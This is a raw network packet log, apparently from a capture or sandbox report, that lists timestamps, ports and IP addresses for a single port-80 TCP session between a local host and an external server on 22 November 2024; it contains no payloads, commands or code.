Nov 22, 2024 20:35:22.934349060 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.934465885 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.934516907 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.937145948 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.937269926 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.937340975 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.939977884 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.940037012 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.940131903 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.940174103 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.942714930 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.942764997 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.942807913 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.942852974 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.945451975 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.945590973 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.945656061 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.948216915 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.948270082 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.948306084 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.948349953 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.950809956 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.950859070 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.950923920 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.951028109 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.953481913 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.953586102 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.953656912 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.955904007 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.955996037 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.956024885 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.956068039 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.958462954 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.958511114 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.958556890 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.958597898 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.961025000 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.961154938 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.961227894 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.963594913 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.963669062 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.963707924 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.963756084 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.966218948 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.966268063 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.966269016 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.966306925 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.968728065 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.968853951 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.968908072 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.971354961 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.971406937 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.971473932 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.971707106 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.973869085 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.973984003 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.974040985 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.976412058 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.976460934 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.976510048 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.976553917 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.978975058 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.979031086 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.979127884 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.979162931 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.981571913 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.981683016 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.981745005 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.984097958 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.984241009 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.984302998 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.986701965 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.986787081 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.986843109 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.989239931 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.989299059 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.989428997 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.989474058 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.991964102 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.992032051 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.992069960 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.993974924 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.994024038 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.994062901 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.994108915 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.996022940 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.996078968 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.996150017 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.996191025 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.998110056 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.998148918 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.998155117 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.998181105 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.000197887 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.000247002 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.000289917 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.000329971 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.002274990 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.002341032 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.002376080 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.002418995 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.004426003 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.004475117 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.004549980 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.004591942 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.006424904 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.006475925 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.006514072 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.006556034 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.008567095 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.008614063 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.008620024 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.008657932 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.010721922 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.010776997 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.010792971 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.010838032 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.051163912 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.051213026 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.051270962 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.051333904 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.052100897 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.052146912 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.052220106 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.052264929 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.054183006 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.054229021 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.054290056 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.054328918 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.056318998 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.056369066 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.056433916 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.056477070 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.058443069 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.058489084 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.058585882 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.058629990 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.110522985 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.110548019 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.110574961 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.110606909 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.110955954 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.111005068 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.111058950 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.111094952 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.112864017 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.112927914 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.112941980 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.112978935 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.114696026 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.114758015 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.114763021 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.114794970 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.116483927 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.116527081 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.116543055 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.116576910 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.118036032 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.118051052 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.118078947 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.118100882 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.119518042 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.119611979 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.119636059 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.119673967 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.120934010 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.120979071 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.121047020 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.121087074 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.122409105 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.122451067 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.122477055 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.122721910 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.123997927 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.124041080 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.124079943 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.124114990 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.125574112 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.125585079 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.125619888 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.126637936 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.126681089 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.126718044 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.126755953 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.128067970 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.128108025 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.128150940 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.128187895 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.129571915 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.129614115 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.129663944 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.129712105 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.130789042 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.130831957 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.130954027 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.130995035 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.132266045 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.132313013 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.132335901 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.132360935 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.133531094 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.133599997 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.133644104 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.133687973 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.134939909 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.135004044 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.135142088 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.135202885 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.136240959 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.136291981 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.136357069 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.137476921 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.137686014 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.137787104 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.137833118 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.138997078 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.139054060 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.139141083 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.139179945 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.140362024 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.140408039 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.140436888 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.140474081 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.141745090 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.141789913 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.141841888 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.141887903 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.143129110 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.143173933 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.143220901 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.143258095 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.144494057 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.144536972 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.144623995 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.144731045 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.145898104 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.145939112 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.145991087 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.146030903 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.147233009 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.147308111 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.147345066 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.147380114 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.148612976 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.148653984 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.148720026 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.148902893 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.149976015 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.150053978 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.150113106 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.150165081 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.151385069 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.151422024 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.151451111 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.151527882 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.152715921 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.152760029 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.152805090 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.152892113 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.154093981 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.154143095 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.154211998 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.154299974 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.155493975 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.155538082 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.155685902 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.155726910 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.156796932 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.156838894 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.156919956 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.156960964 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.158174038 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.158230066 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.158296108 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.158337116 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.159683943 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.159728050 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.159758091 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.159796953 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.160902023 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.160947084 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.161017895 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.161056042 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.162350893 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.162391901 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.162425041 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.162461996 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.163686991 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.163762093 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.163800955 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.165035963 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.165132046 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.165148973 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.165165901 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.166426897 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.166475058 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.166500092 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.166531086 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.167829037 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.167870998 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.167933941 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.167968988 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.169156075 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.169194937 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.169272900 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.169308901 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.170480013 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.170521021 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.185149908 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.185255051 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.185260057 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.185300112 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.185745955 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.185796022 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.185870886 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.185909986 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.186949968 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.187000990 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.187052965 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.187127113 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.188147068 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.188232899 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.243081093 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.243125916 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.243249893 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.243515015 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.243665934 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.243722916 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.243757010 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.243808031 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.244885921 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.244937897 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.245199919 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.245249033 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.246103048 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.246155977 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.246241093 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.246288061 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:23.247287989 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:23.247342110 CET	49750	80	192.168.2.4	185.215.113.206
